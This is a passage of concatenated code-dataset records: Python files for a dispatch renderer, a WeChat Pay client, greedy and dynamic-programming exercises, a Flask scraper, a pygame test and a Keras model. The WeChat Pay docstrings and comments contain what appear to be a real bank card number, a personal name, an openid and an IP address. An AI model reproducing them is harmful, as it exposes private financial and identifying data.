reversed(list(enumerate(t))):\n if S_char == T_char:\n ways[j + 1] += ways[j]\n return ways[len(t)]\n \n \n \n","sub_path":"Python/115.py","file_name":"115.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"25501532","text":"\"\"\"Render dispatches from templates.\n\"\"\"\n\nimport logging\n\nimport toml\nimport jinja2\nimport bbcode\n\nfrom meguca import exceptions\nfrom meguca.plugins.src.dispatch_updater import bb_parser\nfrom meguca.plugins.src.dispatch_updater import utils\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass CustomVars():\n \"\"\"Custom variables.\n\n Args:\n custom_vars_path (str|list): Custom vars files.\n \"\"\"\n\n def __init__(self, custom_vars_path):\n self._custom_vars = {}\n\n if isinstance(custom_vars_path, list):\n for custom_vars_file in custom_vars_path:\n self.load_custom_vars(custom_vars_file)\n elif custom_vars_path == '':\n logger.debug('No custom vars file found')\n else:\n self.load_custom_vars(custom_vars_path)\n\n def load_custom_vars(self, custom_vars_file):\n \"\"\"Load custom vars from files\n\n Args:\n custom_vars_file (str): Custom vars file name\n \"\"\"\n\n try:\n self._custom_vars.update(toml.load(custom_vars_file))\n logger.debug('Loaded custom vars file \"%s\"', custom_vars_file)\n except FileNotFoundError:\n raise FileNotFoundError('Custom vars file \"%s\" not found'.format(custom_vars_file))\n\n @property\n def custom_vars(self):\n return self._custom_vars\n\n\nclass TemplateRenderer():\n 
\"\"\"Render a dispatch template.\n\n Args:\n template_dir_path (str): Template file directory.\n filters_path (str): Path to filters file.\n template_ext (str): Template file extension.\n \"\"\"\n\n def __init__(self, template_dir_path, filters_path, template_ext):\n if template_dir_path is None:\n raise exceptions.PluginError('Dispatch template directory path not configured!')\n template_loader = jinja2.FileSystemLoader(template_dir_path)\n # Make access to undefined context variables generate logs.\n undef = jinja2.make_logging_undefined(logger=logger)\n self.env = jinja2.Environment(loader=template_loader, trim_blocks=True, undefined=undef)\n self.template_ext = template_ext\n\n if filters_path is not None:\n filters = utils.get_funcs(filters_path)\n if filters is None:\n logger.warning('Filter file not found!')\n else:\n loaded_filters = {}\n for filter in filters:\n loaded_filters[filter[0]] = filter[1]\n logger.debug('Loaded filter \"%s\"', filter[0])\n self.env.filters.update(loaded_filters)\n logger.info('Loaded all custom filters')\n\n def validate_templates(self):\n \"\"\"Validate syntax and existence of templates.\n \"\"\"\n\n for template in self.env.list_templates(extensions=self.template_ext):\n try:\n self.env.get_template(template)\n except jinja2.TemplateSyntaxError as e:\n logger.error('Dispatch template \"%s\" syntax error at line %d: %s',\n template, e.lineno, e.message)\n\n def render(self, name, context):\n \"\"\"Render a dispatch template.\n\n Args:\n name (str): Dispatch template name.\n context (dict): Context for the template.\n\n Returns:\n str: Rendered template.\n \"\"\"\n\n template_path = '{}.{}'.format(name, self.template_ext)\n return self.env.get_template(template_path).render(context)\n\n\nclass Renderer():\n \"\"\"Render dispatches from templates and process custom BBcode tags.\n\n Args:\n config: Configuration.\n \"\"\"\n\n def __init__(self, config):\n template_config = config.get('template', {})\n self.template_renderer = TemplateRenderer(template_config.get('template_dir_path', None),\n template_config.get('filters_path', None),\n template_config.get('template_file_ext', None))\n\n bb_config = config.get('bbcode', {})\n self.bb_parser = bb_parser.BBParser(bb_config.get('simple_formatter_path', None),\n bb_config.get('complex_formatter_path', None),\n bb_config.get('complex_formatter_config_path', None))\n\n custom_vars = CustomVars(config.pop('custom_vars_path', None))\n\n # Context for templates\n self.ctx = custom_vars.custom_vars\n\n def update_ctx(self, data, plg_config, ext_config, dispatch_info):\n \"\"\"Update context with new info.\n\n Args:\n data (dict): New data.\n plg_config (dict): Our plugin's configuration.\n config (dict): Meguca and other plugins' configuration.\n dispatch_info (dict): Dispatch information.\n \"\"\"\n\n self.ctx.update({'data_products': data, 'config': plg_config,\n 'ext_config': ext_config, 'dispatch_info': dispatch_info})\n\n def render(self, name):\n \"\"\"Render a dispatch.\n\n Args:\n name (str): Dispatch file name.\n\n Returns:\n str: Rendered dispatch.\n \"\"\"\n\n self.ctx['current_dispatch'] = {'name': name}\n self.ctx['current_dispatch'].update(self.ctx['dispatch_info'][name])\n\n rendered = self.template_renderer.render(name, self.ctx)\n rendered = self.bb_parser.format(rendered, **self.ctx)\n\n logger.debug('Rendered dispatch \"%s\"', name)\n\n return 
rendered\n","sub_path":"meguca/plugins/src/dispatch_updater/dispatch_renderer.py","file_name":"dispatch_renderer.py","file_ext":"py","file_size_in_byte":5503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"188252859","text":"# coding: utf-8\nimport logging\nimport requests\nimport rsa\nimport os\nimport base64\nimport json as json_pkg\nfrom hashlib import md5, sha1\nfrom pickle import dumps, loads\n\nfrom Crypto.Cipher import PKCS1_OAEP\nfrom Crypto.PublicKey import RSA\n\nfrom werobot.client import Client, time\nfrom werobot.utils import generate_token\n\nfrom requests.compat import json as _json\n\nfrom django.conf import settings\n\nfrom management.utils.util import dict_parse_from_xml\nfrom management.utils.redis_db import redis\n\n# 获取jsticket\nJSTICKET_URI = 'https://api.weixin.qq.com/cgi-bin/ticket/getticket'\n# 参数微信js config签名url\nJSPARAMS_URI = 'http://mp.weixin.qq.com?params=value'\n# 统一支付接口\nJSPAY_URI = 'https://api.mch.weixin.qq.com/pay/unifiedorder'\n# 企业付款到银行卡\nPAY_BANK_URI = 'https://api.mch.weixin.qq.com/mmpaysptrans/pay_bank'\n# RSA public key\nPUBLIC_KEY_URI = 'https://fraud.mch.weixin.qq.com/risk/getpublickey'\n# pay to promotion\nPROMOTION_TRANSFERS_URI = \"https://api.mch.weixin.qq.com/mmpaymkttransfers/promotion/transfers\"\n# query bank uri\nQUERY_BANK_URI = \"https://api.mch.weixin.qq.com/mmpaysptrans/query_bank\"\n# query transfer uri\nQUERY_TRANSFER_INFO_URI = \"https://api.mch.weixin.qq.com/mmpaymkttransfers/gettransferinfo\"\n\nBASE_PATH = os.path.dirname(os.path.abspath(__file__))\nPUBLIC_PEM = os.path.join(\"\", BASE_PATH, \"pem\", settings.PROJECT_NAME, \"public.pem\")\n\nAPICLIENT_CERT = os.path.join(\"/\", BASE_PATH, \"pem\", settings.PROJECT_NAME, \"apiclient_cert.pem\")\nAPICLIENT_KEY = os.path.join(\"/\", BASE_PATH, \"pem\", settings.PROJECT_NAME, \"apiclient_key.pem\")\n\n# 接口查询\nORDER_QUERY = \"https://api.mch.weixin.qq.com/pay/orderquery\"\nlogger = logging.getLogger('sdk')\n\n\ndef get_sign(kwargs, sign_type='MD5', pay_sign_key=None, is_upper=True):\n \"\"\"\n 微信签名参数组装\n @param: params 参与签名的参数\n @param: sign_type 签名类型\n @param: pay_sign_key 是否需要支付密钥\n @return: sign, sign_type\n \"\"\"\n # 根据ascii码进行排序\n print(kwargs, 'kwargs')\n params = list(kwargs.items())\n params.sort()\n # urle拼接\n string = \"&\".join([\"%s=%s\" % (str(p[0]), str(p[1])) for p in params])\n if pay_sign_key:\n string += \"&key=%s\" % pay_sign_key\n print(string, 'string')\n string = bytes(string, \"UTF-8\")\n # 生成签名 Point: 这里签名时间戳,必须与wxconfig中得时间戳一致---坑呀\n sign = \"\"\n if sign_type == \"MD5\":\n sign = md5(string).hexdigest().upper() if is_upper else md5(string).hexdigest()\n if sign_type == \"SHA1\":\n sign = sha1(string).hexdigest().upper() if is_upper else sha1(string).hexdigest()\n return sign, sign_type\n\n\nclass PayException(Exception):\n pass\n\n\nclass PayClient(Client):\n def __init__(self, appid, appserect):\n # werobot 更新\n config = {'APP_ID': appid, 'APP_SECRET': appserect}\n super(PayClient, self).__init__(config)\n self.js_ticket = None\n self.js_express = None\n self.pay_sign_key = settings.WECHAT_API_KEY\n self.partner_id = settings.WECHAT_PARTNER_ID\n self.line_url = \"weixin://wxpay/bizpayurl?sign={sign}&appid={appid}&mch_id={mch_id}&product_id={product_id}&\" \\\n \"time_stamp={time_stamp}&nonce_str={nonce_str}\"\n\n @property\n def _now_time(self):\n return int(time.time())\n\n def partner_trade_no(self, extra_code):\n return \"{}{}\".format(str(self._now_time), extra_code)\n\n def signature(self, 
string):\n \"\"\"\n 公钥加密,提现到银行卡, 签名.\n \"\"\"\n # 读取pem public key文件\n logger.info('PUBLIC_PEM: {}'.format(PUBLIC_PEM))\n with open(PUBLIC_PEM, 'rb') as publickey_file:\n pub = publickey_file.read()\n # 加密\n publickey = RSA.importKey(pub)\n cipher = PKCS1_OAEP.new(publickey)\n\n signature = cipher.encrypt(string.encode(\"utf-8\"))\n signature_base64 = base64.b64encode(signature).decode('utf-8')\n return signature_base64\n\n def request(self, method, url, **kwargs):\n if isinstance(kwargs.get(\"data\", \"\"), dict):\n body = _json.dumps(kwargs[\"data\"], ensure_ascii=False)\n body = body.encode('utf8')\n kwargs[\"data\"] = body\n\n verify = kwargs.pop(\"verify\", True)\n r = requests.request(\n method=method,\n url=url,\n verify=verify,\n **kwargs\n )\n r.raise_for_status()\n # 根据返回格式转换成json\n try:\n json = r.json()\n logger.info(\"json: {}\".format(json))\n except ValueError:\n logger.info(\"content: {}\".format(str(r.content, \"utf-8\")))\n json = dict_parse_from_xml(r.content)\n logger.info(\"content json: {}\".format(json))\n return json\n\n def get_access_token(self):\n \"\"\"\n 判断现有的token是否过期。\n 用户需要多进程或者多机部署可以手动重写这个函数\n 来自定义token的存储,刷新策略。\n :return: 返回token\n \"\"\"\n key_access_token = \"pay_client_access_token\"\n stream = redis.get(key_access_token)\n if stream:\n self._token, self.token_expires_at = loads(stream)\n\n if self._token:\n now = time.time()\n if self.token_expires_at - now > 480:\n logger.info(\"exipres ticket: {}\".format(self.token_expires_at - now))\n return self._token\n\n json = self.grant_token()\n self._token = json[\"access_token\"]\n self.token_expires_at = int(time.time()) + json[\"expires_in\"]\n # set\n redis.set(key_access_token, dumps([self._token, self.token_expires_at]))\n return self._token\n\n def grant_js_ticket(self):\n \"\"\"\n 获取 获取jssdk ticket。\n :return: 返回的 JSON 数据包\n \"\"\"\n return self.get(\n url=JSTICKET_URI,\n params={\"access_token\": self.token, \"type\": \"jsapi\"}\n )\n\n @property\n def jsticket(self):\n \"\"\"\n 得到jsticket\n \"\"\"\n key_ticket = \"pay_client_jsticket\"\n stream = redis.get(key_ticket)\n\n _jsticket = 0\n _expires_at = 0\n if stream:\n _jsticket, _expires_at = loads(stream)\n\n if _jsticket:\n now = time.time()\n if _expires_at - now > 480:\n logger.info(\"exipres ticket: {}\".format(_expires_at - now))\n return _jsticket\n\n json = self.grant_js_ticket()\n _jsticket = json['ticket']\n js_express = self._now_time + json['expires_in']\n # set\n redis.set(key_ticket, dumps([_jsticket, js_express]))\n return _jsticket\n\n def jsconfig(self, **kwargs):\n \"\"\"\n 得到jsconfig 配置信息\n \"\"\"\n json = {\n \"noncestr\": generate_token(),\n \"jsapi_ticket\": self.jsticket,\n \"timestamp\": self._now_time,\n \"url\": kwargs.pop(\"url\", JSPARAMS_URI)\n }\n # 根据参与签名参数得到签名\n sign_type = 'SHA1'\n sign, _ = get_sign(json, sign_type=sign_type, is_upper=False)\n json['sign'] = sign\n json[\"appid\"] = self.appid\n return json, sign, sign_type\n\n def get_prepay_id_by_unified_pay(self, **package):\n xml_data = \"\"\"\n \n {appid}\n \n {mch_id}\n {nonce_str}\n {notify_url}\n {openid}\n {out_trade_no}\n {spbill_create_ip}\n {total_fee}\n {trade_type}\n \n \n \"\"\"\n package.update({\n \"appid\": self.appid,\n \"mch_id\": self.partner_id,\n \"nonce_str\": generate_token(),\n })\n # 根据参与签名参数得到签名\n sign, _ = get_sign(package, pay_sign_key=self.pay_sign_key)\n package['sign'] = sign\n # 转换xml数据\n xml_data = xml_data.format(**package).encode(\"utf-8\")\n\n # 请求统一支付下单接口\n json = self.post(JSPAY_URI, data=xml_data)\n logger.info(\"xml_data: 
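# Hedged sketch of the XML fallback inside request() above: WeChat pay
# endpoints answer with XML, so r.json() raises ValueError and the body is
# re-parsed as XML. xmltodict stands in here for the project's own
# dict_parse_from_xml helper, whose exact behavior is assumed.
import xmltodict

def parse_wechat_body(content):
    # WeChat wraps every response in a single <xml> root element.
    return xmltodict.parse(content).get('xml', {})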
{}\".format(xml_data))\n if json[\"return_code\"] == \"SUCCESS\" and json['result_code'] == \"SUCCESS\":\n return json['prepay_id']\n # 返回正常字符,后面需要拼接\n return \"prepay_id\"\n\n def get_line_url(self, **kw):\n \"\"\"\n 获取线下二维码url\n :return:\n \"\"\"\n kw.update({\n \"appid\": self.appid,\n \"mch_id\": self.partner_id,\n \"nonce_str\": generate_token(),\n \"time_stamp\": self._now_time\n })\n # 根据参与签名参数得到签名\n sign, _ = get_sign(kw, pay_sign_key=self.pay_sign_key)\n kw['sign'] = sign\n url = self.line_url.format(**kw)\n return url\n\n def get_prepay_id_by_native_pay(self, **package):\n \"\"\"\n 扫码支付\n 得到二维码code_url\n \"\"\"\n xml_data = \"\"\"\n \n {appid}\n \n {mch_id}\n {nonce_str}\n {notify_url}\n {out_trade_no}\n {spbill_create_ip}\n {total_fee}\n {trade_type}\n {product_id}\n \n \n \"\"\"\n package.update({\n \"appid\": self.appid,\n \"mch_id\": self.partner_id,\n \"nonce_str\": generate_token(),\n })\n # 根据参与签名参数得到签名\n sign, _ = get_sign(package, pay_sign_key=self.pay_sign_key)\n package['sign'] = sign\n # 转换xml数据\n xml_data = xml_data.format(**package)\n\n\n # 请求统一支付下单接口\n json = self.post(JSPAY_URI, data=xml_data.encode(\"utf-8\").decode(\"latin1\"))\n if json[\"return_code\"] == \"SUCCESS\" and json['result_code'] == \"SUCCESS\":\n return json['prepay_id'], json['code_url']\n # 返回正常字符,后面需要拼接\n return \"prepay_id\", \"\"\n\n def get_line_scan_callback_xml(self, **kw):\n \"\"\"\n 组织线下支付回调返回prepay_id xml数据\n \"\"\"\n xml_data = \"\"\"\n {return_code}\n {result_code}\n {appid}\n {mch_id}\n \n \n \n \n \"\"\"\n kw.update({\n \"appid\": self.appid,\n \"mch_id\": self.partner_id,\n \"nonce_str\": generate_token(),\n })\n # 根据参与签名参数得到签名\n sign, _ = get_sign(kw, pay_sign_key=self.pay_sign_key)\n kw['sign'] = sign\n # 转换xml数据\n xml_data = xml_data.format(**kw)\n \n\n return xml_data\n\n def orderquery(self, **package):\n \"\"\"\n 订单查询\n 返回订单支付状态\n \"\"\"\n xml_data = \"\"\"\n \n {appid}\n {mch_id}\n {nonce_str}\n {out_trade_no}\n \n \n \"\"\"\n package.update({\n \"appid\": self.appid,\n \"mch_id\": self.partner_id,\n \"nonce_str\": generate_token(),\n })\n # 根据参与签名参数得到签名\n sign, _ = get_sign(package, pay_sign_key=self.pay_sign_key)\n package['sign'] = sign\n # 转换xml数据\n xml_data = xml_data.format(**package)\n\n json = self.post(ORDER_QUERY, data=xml_data)\n if json[\"return_code\"] == \"SUCCESS\" and json['result_code'] == \"SUCCESS\":\n return json['trade_state'], json\n return 0, {}\n\n def out_trade_no(self, pid):\n _out_trade_no = str(time.time()).replace(\".\", \"\") + str(pid)\n return _out_trade_no[:20]\n\n def js_pay_package(self, **kwargs):\n \"\"\"\n chooseWXPay 参数\n timestamp: {{ wxpay.timestamp }}, // 参与签名key为timeStamp,必须与wxconfig中的时间戳一致\n nonceStr: '{{ wxpay.nonceStr }}', // 支付签名随机串,不长于 32 位\n package: '{{ wxpay.package }}', // 统一支付接口返回的prepay_id参数值,提交格式如:prepay_id=***)\n signType: '{{ wxpay.signType }}', // 签名方式,默认为'SHA1',使用新版支付需传入'MD5'\n \"\"\"\n # 更新默认参与签名参数\n kwargs.update({\n \"appId\": self.appid,\n \"nonceStr\": generate_token(),\n \"signType\": \"MD5\"\n })\n # 根据参与签名参数得到签名\n sign, _ = get_sign(kwargs, pay_sign_key=self.pay_sign_key)\n kwargs['paySign'] = sign\n return kwargs\n\n def wap_h5_pay(self, **kwargs):\n \"\"\"\n H5支付\n \"\"\"\n xml_data = \"\"\"\n \n {appid}\n \n {mch_id}\n {nonce_str}\n {notify_url}\n {out_trade_no}\n {spbill_create_ip}\n {total_fee}\n {trade_type}\n {scene_info}\n \n \n \"\"\"\n wap_url = kwargs.pop(\"wap_url\", \"\")\n wap_name = kwargs.pop(\"wap_name\", \"\")\n scene_info = {\n \"h5_info\": {\n \"type\": \"Wap\",\n \"wap_url\": wap_url,\n 
\"wap_name\": wap_name\n }\n }\n kwargs['scene_info'] = json_pkg.dumps(scene_info)\n # 更新默认参与签名参数\n kwargs.update({\n \"appid\": self.appid,\n \"mch_id\": self.partner_id,\n \"nonce_str\": generate_token(),\n \"trade_type\": \"MWEB\"\n })\n logger.info(\"sign before kwargs: {}\".format(kwargs))\n sign, _ = get_sign(kwargs, pay_sign_key=self.pay_sign_key)\n kwargs['sign'] = sign\n logger.info(\"sign after kwargs: {}\".format(kwargs))\n xml_data = xml_data.format(**kwargs).encode(\"utf-8\")\n\n json = self.post(JSPAY_URI, data=xml_data)\n logger.info(\"wechat response json data: {}\".format(json))\n return json\n\n def pay_to_bank(self, **kwargs):\n \"\"\"\n 企业付款到银行卡\n kwargs['amount'] = 1\n kwargs['bank_code'] = 1002\n kwargs['bank_note'] = 'test'\n kwargs['desc'] = 'test'\n kwargs['bank_no'] = '6212261001014506692'\n kwargs['true_name'] = '向进'\n kwargs['partner_trade_no'] = str(self._now_time)\n \"\"\"\n xml_data = \"\"\"\n \n {amount}\n {bank_code}\n {bank_note}\n {desc}\n {enc_bank_no}\n {enc_true_name}\n {mch_id}\n {nonce_str}\n {partner_trade_no}\n {sign}\n \n \"\"\"\n kwargs.update({\n \"mch_id\": self.partner_id,\n \"nonce_str\": generate_token(),\n })\n \n bank_no = kwargs.pop(\"bank_no\", None)\n true_name = kwargs.pop(\"true_name\", None)\n if not (bank_no and true_name):\n raise PayException(\"bank_no and true_name is required\")\n\n # enc_bank_no, enc_true_name 加密\n enc_bank_no = self.signature(bank_no)\n enc_true_name = self.signature(true_name)\n\n kwargs['enc_bank_no'] = enc_bank_no\n kwargs['enc_true_name'] = enc_true_name\n\n sign, _ = get_sign(kwargs, pay_sign_key=self.pay_sign_key)\n kwargs['sign'] = sign\n logger.info(\"请求提现到银行卡的参数:{}\".format(kwargs))\n xml_data = xml_data.format(**kwargs).encode(\"utf-8\")\n\n\n json = self.post(PAY_BANK_URI, data=xml_data, cert=(APICLIENT_CERT, APICLIENT_KEY), verify=True)\n result_code = json.get(\"result_code\")\n # SYSTEMERROR, INVALID_REQUEST 微信系统错误,需要使用原请求参数进行重试\n # if result_code in (\"SYSTEMERROR\", \"INVALID_REQUEST\"):\n # del kwargs['sign']\n # self.pay_to_bank(**kwargs)\n\n return json\n\n def query_bank(self, **kwargs):\n \"\"\"\n 查询企业付款银行卡\n \"\"\"\n xml_data = \"\"\"\n \n {mch_id}\n {nonce_str}\n {partner_trade_no}\n {sign}\n \n \"\"\"\n kwargs.update({\n \"mch_id\": self.partner_id,\n \"nonce_str\": generate_token(),\n })\n\n sign, _ = get_sign(kwargs, pay_sign_key=self.pay_sign_key)\n kwargs['sign'] = sign\n\n xml_data = xml_data.format(**kwargs)\n\n\n json = self.post(QUERY_BANK_URI, data=xml_data, cert=(APICLIENT_CERT, APICLIENT_KEY), verify=True)\n return json\n\n def promotion_transfers(self, **kwargs):\n \"\"\"\n 提现到零钱\n \"\"\"\n xml_data = \"\"\"\n \n {mch_appid}\n {mchid}\n {nonce_str}\n {partner_trade_no}\n {openid}\n {check_name}\n {re_user_name}\n {amount}\n {desc}\n {spbill_create_ip}\n {sign}\n \n \"\"\"\n kwargs.update({\n \"mch_appid\": self.appid,\n \"mchid\": self.partner_id,\n \"nonce_str\": generate_token(),\n })\n\n # kwargs['partner_trade_no'] = str(self._now_time)\n # kwargs['openid'] = 'oANoEwGS99wH34zfu-dYaCzoV0cM'\n # kwargs['check_name'] = 'NO_CHECK'\n # kwargs['re_user_name'] = '向进'\n # kwargs['amount'] = 100\n # kwargs['desc'] = 'desc'\n # kwargs['spbill_create_ip'] = '139.227.252.215'\n\n sign, _ = get_sign(kwargs, pay_sign_key=self.pay_sign_key)\n kwargs['sign'] = sign\n\n logger.info(\"Wechat Pay Arguments: {}\".format(kwargs))\n\n xml_data = xml_data.format(**kwargs).encode(\"utf-8\")\n\n json = self.post(PROMOTION_TRANSFERS_URI, data=xml_data, cert=(APICLIENT_CERT, APICLIENT_KEY), 
verify=True)\n\n result_code = json.get(\"result_code\")\n if result_code == \"FAIL\":\n err_code = json.get(\"err_code\")\n if err_code in (\"SYSTEMERROR\", \"INVALID_REQUEST\"):\n # 使用原订单号请求\n del kwargs['sign']\n self.promotion_transfers(**kwargs)\n\n return json\n\n def get_transfer_info(self, **kwargs):\n \"\"\"\n 查询企业付款到零钱\n \"\"\"\n xml_data = \"\"\"\n \n \n \n \n \n \n \n \"\"\"\n\n kwargs.update({\n \"mch_id\": self.partner_id,\n \"appid\": self.appid,\n \"nonce_str\": generate_token()\n })\n\n sign, _ = get_sign(kwargs, pay_sign_key=self.pay_sign_key)\n kwargs['sign'] = sign\n\n\n json = self.post(QUERY_TRANSFER_INFO_URI, data=xml_data, cert=(APICLIENT_CERT, APICLIENT_KEY), verify=True)\n return json\n\n def get_public_key(self, **kwargs):\n \"\"\"\n 获取企业支付PKCS 银行账户名,账户加密公钥\n \"\"\"\n xml_data = \"\"\"\n \n {mch_id}\n {nonce_str}\n {sign_type}\n {sign}\n \n \"\"\"\n kwargs.update({\n \"nonce_str\": generate_token(),\n \"mch_id\": self.partner_id,\n \"sign_type\": \"MD5\"\n })\n\n sign, _ = get_sign(kwargs, sign_type=\"MD5\", pay_sign_key=self.pay_sign_key)\n kwargs['sign'] = sign\n\n xml_data = xml_data.format(**kwargs)\n\n\n json = self.post(PUBLIC_KEY_URI, data=xml_data, cert=(APICLIENT_CERT, APICLIENT_KEY), verify=True)\n\n return_code = json.get('return_code')\n if return_code == 'SUCCESS':\n public_key = json.get(\"pub_key\")\n # wirte public key to file\n with open(PUBLIC_PEM, 'w') as pem:\n pem.write(public_key)\n return json\n\ntry:\n pay_client = PayClient(settings.WECHAT_APP_ID, settings.WECHAT_APP_SECRET)\nexcept NameError:\n pay_client\n","sub_path":"weixin/pay_client.py","file_name":"pay_client.py","file_ext":"py","file_size_in_byte":21975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"466870554","text":"#Uses python3\n\nimport sys\n\ndef flatten(result):\n res = \"\"\n for i in result:\n res+=i\n return res\n\ndef Is_Greater_Or_Equal(digit, max_digit):\n return int(str(digit) + str(max_digit)) >= int(str(max_digit) + str(digit))\n\ndef largest_number(num_list):\n result = []\n while num_list != []:\n max_digit = 0\n for digit in num_list:\n if Is_Greater_Or_Equal(digit, max_digit):\n max_digit = digit\n result.append(max_digit)\n num_list.remove(max_digit)\n final_result = flatten(result)\n return final_result\n\nif __name__ == '__main__':\n input = sys.stdin.read()\n data = input.split()\n a = data[1:]\n print(largest_number(a))\n","sub_path":"Greedy Algorithms/largest_number.py","file_name":"largest_number.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"131003937","text":"from flask import Flask, render_template, request, url_for, redirect\nfrom pyquery import PyQuery as pq\n\napp = Flask(__name__)\n\ndef get_search_results(query):\n d = pq(url='http://slovarji.najdi.si/najdi/%s' % query)\n a = d('#contentDict')\n a('a').attr('onclick', '')\n a('.dict_search_more_pons').remove()\n a('.dict_source').remove()\n a('.dict_title_wrapp').remove()\n return a.html().replace(' ', '')\n\n@app.route('/')\ndef index():\n if 'q' in request.args:\n return redirect(url_for('search', query=request.args['q']))\n\n return render_template('index.html')\n\n@app.route('/najdi/')\ndef search(query=None):\n results = ''\n\n if query:\n results = get_search_results(query)\n\n return render_template('index.html', query=query, results=results)\n\nif __name__ == '__main__':\n 
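# Hedged check for largest_number above: the concatenation comparison
# int(str(a) + str(b)) >= int(str(b) + str(a)) repeatedly picks the digit
# string that should come first; inputs are strings, as read from stdin.
assert largest_number(["3", "30", "34", "5", "9"]) == "9534330"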
app.run(debug=True)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"494429230","text":"from single_player.client import TractorClient\nimport pygame\n\nmy_client = TractorClient(True)\n\ntest_hand = list(my_client.deck_dict.keys())[:25]\ntest_played = list(my_client.deck_dict.keys())[25:27]\ntest_data = []\nfor i in range(4):\n test_data += [i, test_hand, test_played]\ntest_data += ['True', 'True', 'True', 'test_score', 'test_suit', '1']\nmy_client.set_data(test_data)\n\nwhile True:\n for event in pygame.event.get():\n # quit if the quit button was pressed\n if event.type == pygame.QUIT:\n exit()\n elif event.type == pygame.MOUSEBUTTONUP:\n print(event.pos)\n elif event.type == pygame.KEYUP:\n print(event.key)\n my_client.update(True)","sub_path":"single_player/gui_test.py","file_name":"gui_test.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"57411308","text":"import argparse\nimport numpy as np\nimport pickle\nimport os\nimport sys\nos.environ['KERAS_BACKEND'] = 'tensorflow'\nfrom keras.models import Sequential, load_model\nfrom keras.layers import Conv2D\nimport matplotlib.gridspec as gridspec\nfrom keras.models import Model\nfrom keras.layers import Dense, Dropout, Activation, Flatten\nfrom keras.layers import MaxPooling2D\nfrom keras.callbacks import ModelCheckpoint, EarlyStopping, Callback\nimport sklearn\nfrom keras.regularizers import l2,l1\nfrom keras.layers import *\nfrom sklearn.metrics import hamming_loss,label_ranking_loss,confusion_matrix, auc,roc_curve,roc_auc_score, precision_recall_curve\nfrom keras.optimizers import SGD\nfrom keras.layers.merge import concatenate\nfrom keras.losses import binary_crossentropy\nfrom keras import optimizers,losses,metrics\nfrom sklearn import metrics as met\nimport keras.backend as K\nimport keras.backend.tensorflow_backend as tfb\nfrom skmultilearn.utils import measure_per_label\nimport sklearn.metrics as skm\nimport tensorflow as tf\n# from tensorflow_addons.metrics import HammingLoss\nimport scipy\nfrom numpy import asarray\nfrom numpy import ones\nfrom sklearn.metrics import fbeta_score\nfrom sklearn import svm\nimport matplotlib\nmatplotlib.use('TkAgg')\nfrom matplotlib import pyplot\nglobalArr= [[],[],[],[],[],[],[],[]]\nf_globalArr= [[],[],[],[],[],[],[],[]]\nhighest_roc = (-sys.maxsize - 1,0,0)\nhighest_prc = (-sys.maxsize - 1,0,0)\nhighest_accuracy = -sys.maxsize - 1\nextension='single'\n\nclass Metrics(Callback):\n def on_epoch_end(self, batch, logs={}):\n predValid = self.model.predict_proba(self.validation_data[0])\n pred_binary = K.round(predValid)\n Yvalid = self.validation_data[1]\n file = open(\"output-\"+extension+\".txt\", \"w\")\n file.write('Epoch :'+str(batch))\n for i in range(50):\n temp = np.array_str(np.array([pred_binary[i,:],Yvalid[i,:].astype(int)]))\n file.write(temp)\n file.write('\\n--------------\\n')\n self.acc_per_label = measure_per_label(skm.accuracy_score, scipy.sparse.csr_matrix(Yvalid),scipy.sparse.csr_matrix(pred_binary))\n self.f_score = measure_per_label(my_fbeta, scipy.sparse.csr_matrix(Yvalid),scipy.sparse.csr_matrix(pred_binary))\n # self.prc_by_label = measure_per_label(skm.auc(skm.precision_recall_curve[0],skm.precision_recall_curve[1]), scipy.sparse.csr_matrix(Yvalid),scipy.sparse.csr_matrix(predValid.round()))\n fpr = dict()\n tpr = dict()\n roc_auc = 
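# Hedged helper mirroring the per-label ROC loop in the Metrics callback
# above, using the same sklearn roc_curve/auc pair over each output column.
from sklearn.metrics import roc_curve, auc

def per_label_auc(y_true, y_pred):
    scores = {}
    for i in range(y_true.shape[1]):
        fpr, tpr, _ = roc_curve(y_true[:, i], y_pred[:, i])
        scores[i] = auc(fpr, tpr)
    return scores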
dict()\n for i in range(Yvalid.shape[1]):\n fpr[i], tpr[i], _ = roc_curve(Yvalid[:, i], pred_binary[:, i])\n roc_auc[i] = auc(fpr[i], tpr[i])\n global roc_triplet\n roc_triplet = (roc_auc,fpr,tpr)\n self.auc_per_label = roc_auc\n\n prec = dict()\n recall = dict()\n prc_auc = dict()\n for i in range(Yvalid.shape[1]):\n prec[i], recall[i], _ = precision_recall_curve(Yvalid[:, i], pred_binary[:, i])\n prc_auc[i] = auc(recall[i], prec[i])\n global prc_triplet\n prc_triplet = (prc_auc,recall,prec)\n self.prc_per_label = prc_auc\n\n # confusion csr_matrix\n print(\"Confusion matrix: \" ,skm.confusion_matrix(Yvalid, pred_binary))\n\n # print(\"Per label auc:\",self.auc_per_label)\n # print(\"Per label prc:\",self.prc_per_label)\n print(\"Per label accuracy:\",self.acc_per_label)\n try:\n for i in range(8):\n globalArr[i].append(self.acc_per_label[i])\n f_globalArr[i].append(self.f_score[i])\n except:\n print(\"Single label scenario\")\n f_globalArr[0].append(self.f_score) # my fbeta function is faulty\n print(\"Per label f2 score:\",self.f_score)\n global highest_accuracy\n if logs.get('val_accuracy') > highest_accuracy:\n highest_accuracy = logs.get('val_accuracy')\n\n return\n\n\n\ndef calculating_class_weights(y_true):\n from sklearn.utils.class_weight import compute_class_weight,compute_sample_weight\n number_dim = np.shape(y_true)[1]\n weights = np.empty([number_dim, 2])\n for i in range(number_dim):\n weights[i] = compute_class_weight('balanced', np.unique(y_true[:, i]), y_true[:, i])\n return weights\n\ndef get_model(numLabels, numConvLayers, numConvFilters, poolingDropout, learningRate, momentum, length):\n model = Sequential()\n conv1_layer = Conv1D(filters=1000,\n kernel_size=8,\n input_shape=(length, 4),\n padding=\"valid\",\n activation=\"relu\",\n # use_bias=True, 